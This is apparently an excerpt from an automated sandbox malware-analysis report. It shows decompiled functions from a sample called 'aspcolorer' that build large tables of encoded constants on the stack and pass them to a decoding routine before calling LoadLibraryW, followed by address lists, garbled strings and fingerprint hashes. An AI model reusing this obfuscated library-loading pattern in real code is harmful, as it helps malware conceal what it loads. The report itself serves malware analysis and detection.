				 *((intOrPtr*)(_t260 - 0x108)) = 0x716bc4f7;
				 *((intOrPtr*)(_t260 - 0x104)) = 0xa5f220fc;
				 *((intOrPtr*)(_t260 - 0x100)) = 0x3c92fb08;
				 *((intOrPtr*)(_t260 - 0xfc)) = 0x7d234322;
				 *((intOrPtr*)(_t260 - 0xf8)) = 0x92df187;
				 *((intOrPtr*)(_t260 - 0xf4)) = 0x209496a6;
				 *((intOrPtr*)(_t260 - 0xf0)) = 0xe08cdb79;
				 *((intOrPtr*)(_t260 - 0xec)) = 0x460ab09f;
				 *((intOrPtr*)(_t260 - 0xe8)) = 0x8431afb3;
				 *((intOrPtr*)(_t260 - 0xe4)) = 0xe16e402f;
				 *((intOrPtr*)(_t260 - 0xe0)) = 0xe55b4033;
				 *((intOrPtr*)(_t260 - 0xdc)) = 0xca8b028c;
				 *((intOrPtr*)(_t260 - 0xd8)) = 0x5c8c3731;
				 *((intOrPtr*)(_t260 - 0xd4)) = 0x3b4e0b2b;
				 *((intOrPtr*)(_t260 - 0xd0)) = 0x4c1ea806;
				 *((intOrPtr*)(_t260 - 0xcc)) = 0x34207724;
				 *((intOrPtr*)(_t260 - 0xc8)) = 0x73cc8bb8;
				 *((intOrPtr*)(_t260 - 0xc4)) = 0x175b4314;
				 *((intOrPtr*)(_t260 - 0xc0)) = 0x1f3d713d;
				 *((intOrPtr*)(_t260 - 0xbc)) = 0xb4b15693;
				 *((intOrPtr*)(_t260 - 0xb8)) = 0xa21373f2;
				 *((intOrPtr*)(_t260 - 0xb4)) = 0xf343a957;
				 *((intOrPtr*)(_t260 - 0xb0)) = 0x85b2f400;
				 *((intOrPtr*)(_t260 - 0xac)) = 0x5111c673;
				 *((intOrPtr*)(_t260 - 0xa8)) = 0xcad6892c;
				 *((intOrPtr*)(_t260 - 0xa4)) = 0x5394a64b;
				 *((intOrPtr*)(_t260 - 0xa0)) = 0xc4f571e9;
				 *((intOrPtr*)(_t260 - 0x9c)) = 0x420ec3d0;
				 *((intOrPtr*)(_t260 - 0x98)) = 0x518cf580;
				 *((intOrPtr*)(_t260 - 0x94)) = 0x30ba759b;
				 *((intOrPtr*)(_t260 - 0x90)) = 0xf86f0bff;
				 *((intOrPtr*)(_t260 - 0x8c)) = 0x3464e92f;
				 *((intOrPtr*)(_t260 - 0x88)) = 0x60db085b;
				 *((intOrPtr*)(_t260 - 0x84)) = 0xda6f280c;
				 *((intOrPtr*)(_t260 - 0x80)) = 0xfac86996;
				 *((intOrPtr*)(_t260 - 0x7c)) = 0x8506f489;
				 *((intOrPtr*)(_t260 - 0x78)) = 0xb4e65cce;
				 *((intOrPtr*)(_t260 - 0x74)) = 0xff0acc54;
				 *((intOrPtr*)(_t260 - 0x70)) = 0xedec65e4;
				 *((intOrPtr*)(_t260 - 0x6c)) = 0x93b9d98a;
				 *((intOrPtr*)(_t260 - 0x68)) = 0xe88825c0;
				 *((intOrPtr*)(_t260 - 0x64)) = 0xaeb87994;
				 *((intOrPtr*)(_t260 - 0x60)) = 0x34c4e12d;
				 *((intOrPtr*)(_t260 - 0x5c)) = 0x13bf4fba;
				 *((intOrPtr*)(_t260 - 0x58)) = 0xe5103a3c;
				 *((intOrPtr*)(_t260 - 0x54)) = 0x6bfebd55;
				 *((intOrPtr*)(_t260 - 0x50)) = 0xefb5c235;
				 *((intOrPtr*)(_t260 - 0x4c)) = 0xb892aa02;
				 *((intOrPtr*)(_t260 - 0x48)) = 0xda09bd81;
				 *((intOrPtr*)(_t260 - 0x44)) = 0xfb1444c6;
				 *((intOrPtr*)(_t260 - 0x40)) = 0x20d651c0;
				 *((intOrPtr*)(_t260 - 0x3c)) = 0x1cbbae38;
				 *((intOrPtr*)(_t260 - 0x38)) = 0xcadd6033;
				 *((intOrPtr*)(_t260 - 0x34)) = 0xf33dff32;
				 *((intOrPtr*)(_t260 - 0x30)) = 0x8b96e691;
				 *((intOrPtr*)(_t260 - 0x2c)) = 0xb83bef30;
				 *((intOrPtr*)(_t260 - 0x28)) = 0x1186dcfe;
				 *((intOrPtr*)(_t260 - 0x24)) = 0x3f575fbf;
				 *((intOrPtr*)(_t260 - 0x20)) = 0x77ad60e4;
				 *((intOrPtr*)(_t260 - 0x1c)) = 0x3f603246;
				 *((intOrPtr*)(_t260 - 0x18)) = 0x85886303;
				 *((intOrPtr*)(_t260 - 0x14)) = 0x1e586d0c;
				 *((intOrPtr*)(_t260 - 0x10)) = 0x7e399f5;
				 *((intOrPtr*)(_t260 - 0xc)) = 0x69610564;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t260 - 8)) = 0x7bea8ae4;
				 *((intOrPtr*)(_t260 - 4)) = 0xe702f469;
				_t258 = L02D61D10(0x2d72650, 0xc0, __edi, __esi);
				 *0x2d771dc = LoadLibraryW(_t246);
				L02D61DB0(_t258);
				return E02D61570(_t250,  *0x2d771dc, _t260 - 0x3d0, _t258, 0xf4, 0x23be3f7f, 0x2d75080);
			}

0x02d672da
0x02d672da
0x02d672e4
0x02d672ee
0x02d672f8
0x02d67302
0x02d6730c
0x02d67316
0x02d67320
0x02d6732a
0x02d67334
0x02d6733e
0x02d67348
0x02d67352
0x02d6735c
0x02d67366
0x02d67370
0x02d6737a
0x02d67384
0x02d6738e
0x02d67398
0x02d673a2
0x02d673ac
0x02d673b6
0x02d673c0
0x02d673ca
0x02d673d4
0x02d673de
0x02d673e8
0x02d673f2
0x02d673fc
0x02d67406
0x02d67410
0x02d6741a
0x02d67424
0x02d6742e
0x02d67438
0x02d67442
0x02d6744c
0x02d67456
0x02d67460
0x02d6746a
0x02d67474
0x02d6747e
0x02d67488
0x02d67492
0x02d6749c
0x02d674a6
0x02d674b0
0x02d674ba
0x02d674c4
0x02d674ce
0x02d674d8
0x02d674e2
0x02d674ec
0x02d674f6
0x02d67500
0x02d6750a
0x02d67514
0x02d6751e
0x02d67528
0x02d67532
0x02d6753c
0x02d67546
0x02d67550
0x02d6755a
0x02d67564
0x02d6756e
0x02d67578
0x02d67582
0x02d6758c
0x02d67596
0x02d675a0
0x02d675aa
0x02d675b4
0x02d675be
0x02d675c8
0x02d675d2
0x02d675dc
0x02d675e6
0x02d675f0
0x02d675fa
0x02d67604
0x02d6760e
0x02d67618
0x02d67622
0x02d6762c
0x02d67636
0x02d67640
0x02d6764a
0x02d67654
0x02d6765e
0x02d67668
0x02d67672
0x02d6767c
0x02d67686
0x02d67690
0x02d6769a
0x02d676a4
0x02d676ae
0x02d676b8
0x02d676c2
0x02d676cc
0x02d676d6
0x02d676e0
0x02d676ea
0x02d676f4
0x02d676fe
0x02d67708
0x02d67712
0x02d6771c
0x02d67726
0x02d67730
0x02d6773a
0x02d67744
0x02d6774e
0x02d67758
0x02d67762
0x02d6776c
0x02d67776
0x02d67780
0x02d6778a
0x02d67794
0x02d6779e
0x02d677a8
0x02d677b2
0x02d677bc
0x02d677c6
0x02d677d0
0x02d677da
0x02d677e4
0x02d677ee
0x02d677f8
0x02d67802
0x02d6780c
0x02d67816
0x02d67820
0x02d6782a
0x02d67834
0x02d6783e
0x02d67848
0x02d67852
0x02d6785c
0x02d67866
0x02d67870
0x02d6787a
0x02d67884
0x02d6788e
0x02d67898
0x02d678a2
0x02d678ac
0x02d678b6
0x02d678c0
0x02d678ca
0x02d678d4
0x02d678de
0x02d678e8
0x02d678f2
0x02d678fc
0x02d67906
0x02d67910
0x02d6791a
0x02d67924
0x02d6792e
0x02d67938
0x02d67942
0x02d6794c
0x02d67956
0x02d67960
0x02d6796a
0x02d67974
0x02d6797e
0x02d67988
0x02d67992
0x02d6799c
0x02d679a6
0x02d679b0
0x02d679ba
0x02d679c4
0x02d679ce
0x02d679d8
0x02d679e2
0x02d679ec
0x02d679f6
0x02d67a00
0x02d67a0a
0x02d67a14
0x02d67a1e
0x02d67a28
0x02d67a32
0x02d67a3c
0x02d67a46
0x02d67a50
0x02d67a5a
0x02d67a64
0x02d67a6e
0x02d67a78
0x02d67a82
0x02d67a8c
0x02d67a96
0x02d67aa0
0x02d67aaa
0x02d67ab4
0x02d67abe
0x02d67ac8
0x02d67ad2
0x02d67adc
0x02d67ae6
0x02d67af0
0x02d67afa
0x02d67b04
0x02d67b0e
0x02d67b18
0x02d67b22
0x02d67b29
0x02d67b30
0x02d67b37
0x02d67b3e
0x02d67b45
0x02d67b4c
0x02d67b53
0x02d67b5a
0x02d67b61
0x02d67b68
0x02d67b6f
0x02d67b76
0x02d67b7d
0x02d67b84
0x02d67b8b
0x02d67b92
0x02d67b99
0x02d67ba0
0x02d67ba7
0x02d67bae
0x02d67bb5
0x02d67bbc
0x02d67bc3
0x02d67bca
0x02d67bd1
0x02d67bd8
0x02d67bdf
0x02d67be6
0x02d67bed
0x02d67bf4
0x02d67bfe
0x02d67c0a
0x02d67c19
0x02d67c24
0x02d67c29
0x02d67c55

APIs

LoadLibraryW.KERNEL32(00000000), ref: 02D67C1C

Strings

$w 4, xrefs: 02D67A64
tcZ], xrefs: 02D6769A
JIx, xrefs: 02D6756E
wk#m, xrefs: 02D675D2
/@n, xrefs: 02D67A28
d;, xrefs: 02D677BC
'/~, xrefs: 02D6744C
F2`?, xrefs: 02D67BD1
3@[, xrefs: 02D67A32
e, xrefs: 02D67B3E
"C#}, xrefs: 02D679EC
9I;\, xrefs: 02D67820
/d4, xrefs: 02D67B04
LP 3, xrefs: 02D678DE
~o>, xrefs: 02D6794C

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: "C#}$$w 4$/@n$/d4$3@[$9I;\$F2`?$JIx$LP 3$tcZ]$wk#m$~o>$d;$'/~$e
API String ID: 1029625771-3739738973
Opcode ID: a38f63e4611fef8d79c426191965025a8d99d379aff8dc91a127669025fb12ae
Instruction ID: 77f90ce56a0632b59276481f3783228e29e0327d7667ba9fb70e23790dea2523
Opcode Fuzzy Hash: a38f63e4611fef8d79c426191965025a8d99d379aff8dc91a127669025fb12ae
Instruction Fuzzy Hash: 8612A7B48463A98FDB71DF8299897CDBA74BB12744F6086C8C1593B314CB750B86CF85

Uniqueness

Uniqueness Score: -1.00%

Function 02D6929A, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 266
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E02D6929A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t250;
				void* _t260;

				_t250 = __ebx;
				 *((intOrPtr*)(_t260 - 0x3d0)) = 0x945bf994;
				 *((intOrPtr*)(_t260 - 0x3cc)) = 0xaaa7f7e9;
				 *((intOrPtr*)(_t260 - 0x3c8)) = 0x1aea51f;
				 *((intOrPtr*)(_t260 - 0x3c4)) = 0x21524dcd;
				 *((intOrPtr*)(_t260 - 0x3c0)) = 0x20c5fedd;
				 *((intOrPtr*)(_t260 - 0x3bc)) = 0xcd407cd8;
				 *((intOrPtr*)(_t260 - 0x3b8)) = 0x51189e5e;
				 *((intOrPtr*)(_t260 - 0x3b4)) = 0xb7ad4012;
				 *((intOrPtr*)(_t260 - 0x3b0)) = 0x7e6016c0;
				 *((intOrPtr*)(_t260 - 0x3ac)) = 0x27bc9d9f;
				 *((intOrPtr*)(_t260 - 0x3a8)) = 0xcce4450b;
				 *((intOrPtr*)(_t260 - 0x3a4)) = 0xffbdb221;
				 *((intOrPtr*)(_t260 - 0x3a0)) = 0x284459de;
				 *((intOrPtr*)(_t260 - 0x39c)) = 0xbde44013;
				 *((intOrPtr*)(_t260 - 0x398)) = 0x72125cca;
				 *((intOrPtr*)(_t260 - 0x394)) = 0x7f1958ca;
				 *((intOrPtr*)(_t260 - 0x390)) = 0x4ba690f8;
				 *((intOrPtr*)(_t260 - 0x38c)) = 0xee6a1f46;
				 *((intOrPtr*)(_t260 - 0x388)) = 0xae40e4ee;
				 *((intOrPtr*)(_t260 - 0x384)) = 0x83aa3c05;
				 *((intOrPtr*)(_t260 - 0x380)) = 0x52b53c99;
				 *((intOrPtr*)(_t260 - 0x37c)) = 0xb6f9c41a;
				 *((intOrPtr*)(_t260 - 0x378)) = 0xc439a85b;
				 *((intOrPtr*)(_t260 - 0x374)) = 0x5ba2c6b8;
				 *((intOrPtr*)(_t260 - 0x370)) = 0x267f5c1a;
				 *((intOrPtr*)(_t260 - 0x36c)) = 0xf09b79b9;
				 *((intOrPtr*)(_t260 - 0x368)) = 0xda8cd5b6;
				 *((intOrPtr*)(_t260 - 0x364)) = 0x7b087b1f;
				 *((intOrPtr*)(_t260 - 0x360)) = 0xae78afeb;
				 *((intOrPtr*)(_t260 - 0x35c)) = 0x171d74ec;
				 *((intOrPtr*)(_t260 - 0x358)) = 0x7e95e318;
				 *((intOrPtr*)(_t260 - 0x354)) = 0x26eeda9;
				 *((intOrPtr*)(_t260 - 0x350)) = 0x59409973;
				 *((intOrPtr*)(_t260 - 0x34c)) = 0x7dbb3cf1;
				 *((intOrPtr*)(_t260 - 0x348)) = 0x2c2223d9;
				 *((intOrPtr*)(_t260 - 0x344)) = 0x2eea5cc;
				 *((intOrPtr*)(_t260 - 0x340)) = 0xcdf02b00;
				 *((intOrPtr*)(_t260 - 0x33c)) = 0x8ab05a77;
				 *((intOrPtr*)(_t260 - 0x338)) = 0xa04217d8;
				 *((intOrPtr*)(_t260 - 0x334)) = 0xb5ada83c;
				 *((intOrPtr*)(_t260 - 0x330)) = 0x9e4dfdc2;
				 *((intOrPtr*)(_t260 - 0x32c)) = 0xd06ba0be;
				 *((intOrPtr*)(_t260 - 0x328)) = 0x79dc2075;
				 *((intOrPtr*)(_t260 - 0x324)) = 0xc0a6e5d7;
				 *((intOrPtr*)(_t260 - 0x320)) = 0x5f45e230;
				 *((intOrPtr*)(_t260 - 0x31c)) = 0x22f9a2e5;
				 *((intOrPtr*)(_t260 - 0x318)) = 0x793a9460;
				 *((intOrPtr*)(_t260 - 0x314)) = 0x3802d4da;
				 *((intOrPtr*)(_t260 - 0x310)) = 0xa6fdfe59;
				 *((intOrPtr*)(_t260 - 0x30c)) = 0x60a9f068;
				 *((intOrPtr*)(_t260 - 0x308)) = 0xddcec8e9;
				 *((intOrPtr*)(_t260 - 0x304)) = 0x8e416095;
				 *((intOrPtr*)(_t260 - 0x300)) = 0xdcb56b8d;
				 *((intOrPtr*)(_t260 - 0x2fc)) = 0xbb26e9d2;
				 *((intOrPtr*)(_t260 - 0x2f8)) = 0x5b23c3f2;
				 *((intOrPtr*)(_t260 - 0x2f4)) = 0x4cc0226a;
				 *((intOrPtr*)(_t260 - 0x2f0)) = 0x359fd24a;
				 *((intOrPtr*)(_t260 - 0x2ec)) = 0x157b3100;
				 *((intOrPtr*)(_t260 - 0x2e8)) = 0x367301a0;
				 *((intOrPtr*)(_t260 - 0x2e4)) = 0x26626ba;
				 *((intOrPtr*)(_t260 - 0x2e0)) = 0xb780e7fe;
				 *((intOrPtr*)(_t260 - 0x2dc)) = 0xa5b4d2c;
				 *((intOrPtr*)(_t260 - 0x2d8)) = 0xc12ede;
				 *((intOrPtr*)(_t260 - 0x2d4)) = 0x8ef35a2f;
				 *((intOrPtr*)(_t260 - 0x2d0)) = 0x6a370712;
				 *((intOrPtr*)(_t260 - 0x2cc)) = 0xc977b87b;
				 *((intOrPtr*)(_t260 - 0x2c8)) = 0xb76937a4;
				 *((intOrPtr*)(_t260 - 0x2c4)) = 0x188cf1ac;
				 *((intOrPtr*)(_t260 - 0x2c0)) = 0xbe2b5b9b;
				 *((intOrPtr*)(_t260 - 0x2bc)) = 0x397ae4e7;
				 *((intOrPtr*)(_t260 - 0x2b8)) = 0xd46d37d6;
				 *((intOrPtr*)(_t260 - 0x2b4)) = 0x26a23310;
				 *((intOrPtr*)(_t260 - 0x2b0)) = 0xb591ad95;
				 *((intOrPtr*)(_t260 - 0x2ac)) = 0x3c897820;
				 *((intOrPtr*)(_t260 - 0x2a8)) = 0x45be5e1a;
				 *((intOrPtr*)(_t260 - 0x2a4)) = 0xfe67b394;
				 *((intOrPtr*)(_t260 - 0x2a0)) = 0xaf103837;
				 *((intOrPtr*)(_t260 - 0x29c)) = 0x650fe6f7;
				 *((intOrPtr*)(_t260 - 0x298)) = 0xe45dbc2e;
				 *((intOrPtr*)(_t260 - 0x294)) = 0x9c73736;
				 *((intOrPtr*)(_t260 - 0x290)) = 0xc5fa8cee;
				 *((intOrPtr*)(_t260 - 0x28c)) = 0x9e548246;
				 *((intOrPtr*)(_t260 - 0x288)) = 0x68c8c4f4;
				 *((intOrPtr*)(_t260 - 0x284)) = 0xfe52e809;
				 *((intOrPtr*)(_t260 - 0x280)) = 0xdcbc18f;
				 *((intOrPtr*)(_t260 - 0x27c)) = 0xf4b9914e;
				 *((intOrPtr*)(_t260 - 0x278)) = 0x54a043eb;
				 *((intOrPtr*)(_t260 - 0x274)) = 0x30eb828d;
				 *((intOrPtr*)(_t260 - 0x270)) = 0xec4f8459;
				 *((intOrPtr*)(_t260 - 0x26c)) = 0xd8bb25e2;
				 *((intOrPtr*)(_t260 - 0x268)) = 0xff051de7;
				 *((intOrPtr*)(_t260 - 0x264)) = 0x7f20ccf1;
				 *((intOrPtr*)(_t260 - 0x260)) = 0x6984188d;
				 *((intOrPtr*)(_t260 - 0x25c)) = 0x110bdd2f;
				 *((intOrPtr*)(_t260 - 0x258)) = 0x4220bd8;
				 *((intOrPtr*)(_t260 - 0x254)) = 0xc983a25;
				 *((intOrPtr*)(_t260 - 0x250)) = 0x116557c2;
				 *((intOrPtr*)(_t260 - 0x24c)) = 0xf7e136cb;
				 *((intOrPtr*)(_t260 - 0x248)) = 0x6686d95d;
				 *((intOrPtr*)(_t260 - 0x244)) = 0x53a741f9;
				 *((intOrPtr*)(_t260 - 0x240)) = 0x58e2072a;
				 *((intOrPtr*)(_t260 - 0x23c)) = 0x153d0adb;
				 *((intOrPtr*)(_t260 - 0x238)) = 0x418628c5;
				 *((intOrPtr*)(_t260 - 0x234)) = 0xea6f143f;
				 *((intOrPtr*)(_t260 - 0x230)) = 0xe19a45af;
				 *((intOrPtr*)(_t260 - 0x22c)) = 0x674ae6e8;
				 *((intOrPtr*)(_t260 - 0x228)) = 0xe0897f97;
				 *((intOrPtr*)(_t260 - 0x224)) = 0xe1c2c5d0;
				 *((intOrPtr*)(_t260 - 0x220)) = 0xebb46c1a;
				 *((intOrPtr*)(_t260 - 0x21c)) = 0x90a2b730;
				 *((intOrPtr*)(_t260 - 0x218)) = 0x9ec9667b;
				 *((intOrPtr*)(_t260 - 0x214)) = 0x5aa4223e;
				 *((intOrPtr*)(_t260 - 0x210)) = 0x835eb7e9;
				 *((intOrPtr*)(_t260 - 0x20c)) = 0x8edd986c;
				 *((intOrPtr*)(_t260 - 0x208)) = 0x42a258a5;
				 *((intOrPtr*)(_t260 - 0x204)) = 0xdac4ed66;
				 *((intOrPtr*)(_t260 - 0x200)) = 0xe6f627a8;
				 *((intOrPtr*)(_t260 - 0x1fc)) = 0x679d5eb3;
				 *((intOrPtr*)(_t260 - 0x1f8)) = 0xccd3cb8b;
				 *((intOrPtr*)(_t260 - 0x1f4)) = 0x8c56685e;
				 *((intOrPtr*)(_t260 - 0x1f0)) = 0xd4633c28;
				 *((intOrPtr*)(_t260 - 0x1ec)) = 0x291c32e3;
				 *((intOrPtr*)(_t260 - 0x1e8)) = 0x36bec453;
				 *((intOrPtr*)(_t260 - 0x1e4)) = 0x9415975f;
				 *((intOrPtr*)(_t260 - 0x1e0)) = 0xa372918c;
				 *((intOrPtr*)(_t260 - 0x1dc)) = 0xf2457f65;
				 *((intOrPtr*)(_t260 - 0x1d8)) = 0x52dfb6ba;
				 *((intOrPtr*)(_t260 - 0x1d4)) = 0xc637c7a6;
				 *((intOrPtr*)(_t260 - 0x1d0)) = 0x172cf19d;
				 *((intOrPtr*)(_t260 - 0x1cc)) = 0xf061efd6;
				 *((intOrPtr*)(_t260 - 0x1c8)) = 0x2abd38c8;
				 *((intOrPtr*)(_t260 - 0x1c4)) = 0x609288c9;
				 *((intOrPtr*)(_t260 - 0x1c0)) = 0xa7f17d14;
				 *((intOrPtr*)(_t260 - 0x1bc)) = 0xbd0cd759;
				 *((intOrPtr*)(_t260 - 0x1b8)) = 0x714afe51;
				 *((intOrPtr*)(_t260 - 0x1b4)) = 0x5308d925;
				 *((intOrPtr*)(_t260 - 0x1b0)) = 0x5f173bf0;
				 *((intOrPtr*)(_t260 - 0x1ac)) = 0xf3fc7117;
				 *((intOrPtr*)(_t260 - 0x1a8)) = 0xce85cc57;
				 *((intOrPtr*)(_t260 - 0x1a4)) = 0x641ba30a;
				 *((intOrPtr*)(_t260 - 0x1a0)) = 0xf55fb2f;
				 *((intOrPtr*)(_t260 - 0x19c)) = 0x4e9a38e5;
				 *((intOrPtr*)(_t260 - 0x198)) = 0xb504db76;
				 *((intOrPtr*)(_t260 - 0x194)) = 0xf16dbc6e;
				 *((intOrPtr*)(_t260 - 0x190)) = 0xd95c1501;
				 *((intOrPtr*)(_t260 - 0x18c)) = 0xdd78929b;
				 *((intOrPtr*)(_t260 - 0x188)) = 0xbb79536f;
				 *((intOrPtr*)(_t260 - 0x184)) = 0x39262f3f;
				 *((intOrPtr*)(_t260 - 0x180)) = 0x6f2b0399;
				 *((intOrPtr*)(_t260 - 0x17c)) = 0xba817806;
				 *((intOrPtr*)(_t260 - 0x178)) = 0xf3618c4e;
				 *((intOrPtr*)(_t260 - 0x174)) = 0x3b999741;
				 *((intOrPtr*)(_t260 - 0x170)) = 0x411fbba3;
				 *((intOrPtr*)(_t260 - 0x16c)) = 0x1c2318a2;
				 *((intOrPtr*)(_t260 - 0x168)) = 0x7884a3a7;
				 *((intOrPtr*)(_t260 - 0x164)) = 0xa8b72b25;
				 *((intOrPtr*)(_t260 - 0x160)) = 0xae6874ce;
				 *((intOrPtr*)(_t260 - 0x15c)) = 0x3632cde1;
				 *((intOrPtr*)(_t260 - 0x158)) = 0xfa9eb6c9;
				 *((intOrPtr*)(_t260 - 0x154)) = 0x6747f054;
				 *((intOrPtr*)(_t260 - 0x150)) = 0x8250add4;
				 *((intOrPtr*)(_t260 - 0x14c)) = 0x8f1a8856;
				 *((intOrPtr*)(_t260 - 0x148)) = 0x9a5e0540;
				 *((intOrPtr*)(_t260 - 0x144)) = 0x51e211a4;
				 *((intOrPtr*)(_t260 - 0x140)) = 0x16eb9535;
				 *((intOrPtr*)(_t260 - 0x13c)) = 0x3a2b853f;
				 *((intOrPtr*)(_t260 - 0x138)) = 0x21b4b782;
				 *((intOrPtr*)(_t260 - 0x134)) = 0xc6e892d6;
				 *((intOrPtr*)(_t260 - 0x130)) = 0xf3c161e9;
				 *((intOrPtr*)(_t260 - 0x12c)) = 0x9d0cb6be;
				 *((intOrPtr*)(_t260 - 0x128)) = 0x870ceae7;
				 *((intOrPtr*)(_t260 - 0x124)) = 0x1b7c2e62;
				 *((intOrPtr*)(_t260 - 0x120)) = 0xaa639e05;
				 *((intOrPtr*)(_t260 - 0x11c)) = 0x935ba6a8;
				 *((intOrPtr*)(_t260 - 0x118)) = 0xcea5921;
				 *((intOrPtr*)(_t260 - 0x114)) = 0xa88515c4;
				 *((intOrPtr*)(_t260 - 0x110)) = 0x18b38444;
				 *((intOrPtr*)(_t260 - 0x10c)) = 0xe04bc4e1;
				 *((intOrPtr*)(_t260 - 0x108)) = 0xb7dc2599;
				 *((intOrPtr*)(_t260 - 0x104)) = 0x53709de6;
				 *((intOrPtr*)(_t260 - 0x100)) = 0xa7c6d614;
				 *((intOrPtr*)(_t260 - 0xfc)) = 0xc434e7b6;
				 *((intOrPtr*)(_t260 - 0xf8)) = 0x96795813;
				 *((intOrPtr*)(_t260 - 0xf4)) = 0x10bf5842;
				 *((intOrPtr*)(_t260 - 0xf0)) = 0xf6a128e3;
				 *((intOrPtr*)(_t260 - 0xec)) = 0xa31ba47c;
				 *((intOrPtr*)(_t260 - 0xe8)) = 0x251e1624;
				 *((intOrPtr*)(_t260 - 0xe4)) = 0x573d48da;
				 *((intOrPtr*)(_t260 - 0xe0)) = 0x5858e2eb;
				 *((intOrPtr*)(_t260 - 0xdc)) = 0xc9ad427;
				 *((intOrPtr*)(_t260 - 0xd8)) = 0xe3ee2068;
				 *((intOrPtr*)(_t260 - 0xd4)) = 0x81e5b7ed;
				 *((intOrPtr*)(_t260 - 0xd0)) = 0x7070c364;
				 *((intOrPtr*)(_t260 - 0xcc)) = 0xc2ef28cd;
				 *((intOrPtr*)(_t260 - 0xc8)) = 0x3436d178;
				 *((intOrPtr*)(_t260 - 0xc4)) = 0x239b37e0;
				 *((intOrPtr*)(_t260 - 0xc0)) = 0xf0c584aa;
				 *((intOrPtr*)(_t260 - 0xbc)) = 0xd1db28b4;
				 *((intOrPtr*)(_t260 - 0xb8)) = 0x406e6337;
				 *((intOrPtr*)(_t260 - 0xb4)) = 0x93a9c454;
				 *((intOrPtr*)(_t260 - 0xb0)) = 0x6e066d4d;
				 *((intOrPtr*)(_t260 - 0xac)) = 0xad2578bd;
				 *((intOrPtr*)(_t260 - 0xa8)) = 0xb6e9f59;
				 *((intOrPtr*)(_t260 - 0xa4)) = 0xe3cd7406;
				 *((intOrPtr*)(_t260 - 0xa0)) = 0x65a60eba;
				 *((intOrPtr*)(_t260 - 0x9c)) = 0xeca3479f;
				 *((intOrPtr*)(_t260 - 0x98)) = 0xdcd44d28;
				 *((intOrPtr*)(_t260 - 0x94)) = 0x79111240;
				 *((intOrPtr*)(_t260 - 0x90)) = 0x5cb33c63;
				 *((intOrPtr*)(_t260 - 0x8c)) = 0x56a3e771;
				 *((intOrPtr*)(_t260 - 0x88)) = 0x14c62d50;
				 *((intOrPtr*)(_t260 - 0x84)) = 0x1e4509f1;
				 *((intOrPtr*)(_t260 - 0x80)) = 0xdd090ce7;
				 *((intOrPtr*)(_t260 - 0x7c)) = 0x78fc580a;
				 *((intOrPtr*)(_t260 - 0x78)) = 0xed6f1027;
				 *((intOrPtr*)(_t260 - 0x74)) = 0x86f76681;
				 *((intOrPtr*)(_t260 - 0x70)) = 0x9bb95b77;
				 *((intOrPtr*)(_t260 - 0x6c)) = 0x9bc6e246;
				 *((intOrPtr*)(_t260 - 0x68)) = 0x791c12f;
				 *((intOrPtr*)(_t260 - 0x64)) = 0x3c59615b;
				 *((intOrPtr*)(_t260 - 0x60)) = 0xc50db427;
				 *((intOrPtr*)(_t260 - 0x5c)) = 0x6a69f14c;
				 *((intOrPtr*)(_t260 - 0x58)) = 0x6c370785;
				 *((intOrPtr*)(_t260 - 0x54)) = 0xb9b7b976;
				 *((intOrPtr*)(_t260 - 0x50)) = 0x3c036ed7;
				 *((intOrPtr*)(_t260 - 0x4c)) = 0xf8e375c9;
				 *((intOrPtr*)(_t260 - 0x48)) = 0xdf8af579;
				 *((intOrPtr*)(_t260 - 0x44)) = 0x5165af3e;
				 *((intOrPtr*)(_t260 - 0x40)) = 0x9824b845;
				 *((intOrPtr*)(_t260 - 0x3c)) = 0x6066b0;
				 *((intOrPtr*)(_t260 - 0x38)) = 0x98cb766d;
				 *((intOrPtr*)(_t260 - 0x34)) = 0x42573de5;
				 *((intOrPtr*)(_t260 - 0x30)) = 0xaae67539;
				 *((intOrPtr*)(_t260 - 0x2c)) = 0xaf00ee0f;
				 *((intOrPtr*)(_t260 - 0x28)) = 0xdd020d6a;
				 *((intOrPtr*)(_t260 - 0x24)) = 0x17fad656;
				 *((intOrPtr*)(_t260 - 0x20)) = 0x3147b59e;
				 *((intOrPtr*)(_t260 - 0x1c)) = 0xc2a59b0c;
				 *((intOrPtr*)(_t260 - 0x18)) = 0xab5c7c95;
				 *((intOrPtr*)(_t260 - 0x14)) = 0xfb3f4481;
				 *((intOrPtr*)(_t260 - 0x10)) = 0x6776ca5e;
				 *((intOrPtr*)(_t260 - 0xc)) = 0x941141e;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t260 - 8)) = 0xcde6fece;
				 *((intOrPtr*)(_t260 - 4)) = 0x35ea494f;
				_t258 = L02D61D10(0x2d73000, 0x4c, __edi, __esi);
				 *0x2d771e8 = LoadLibraryW(_t246);
				L02D61DB0(_t258);
				return E02D61570(_t250,  *0x2d771e8, _t260 - 0x3d0, _t258, 0xf4, 0x81460a0, 0x2d75b40);
			}

0x02d6929a
0x02d6929a
0x02d692a4
0x02d692ae
0x02d692b8
0x02d692c2
0x02d692cc
0x02d692d6
0x02d692e0
0x02d692ea
0x02d692f4
0x02d692fe
0x02d69308
0x02d69312
0x02d6931c
0x02d69326
0x02d69330
0x02d6933a
0x02d69344
0x02d6934e
0x02d69358
0x02d69362
0x02d6936c
0x02d69376
0x02d69380
0x02d6938a
0x02d69394
0x02d6939e
0x02d693a8
0x02d693b2
0x02d693bc
0x02d693c6
0x02d693d0
0x02d693da
0x02d693e4
0x02d693ee
0x02d693f8
0x02d69402
0x02d6940c
0x02d69416
0x02d69420
0x02d6942a
0x02d69434
0x02d6943e
0x02d69448
0x02d69452
0x02d6945c
0x02d69466
0x02d69470
0x02d6947a
0x02d69484
0x02d6948e
0x02d69498
0x02d694a2
0x02d694ac
0x02d694b6
0x02d694c0
0x02d694ca
0x02d694d4
0x02d694de
0x02d694e8
0x02d694f2
0x02d694fc
0x02d69506
0x02d69510
0x02d6951a
0x02d69524
0x02d6952e
0x02d69538
0x02d69542
0x02d6954c
0x02d69556
0x02d69560
0x02d6956a
0x02d69574
0x02d6957e
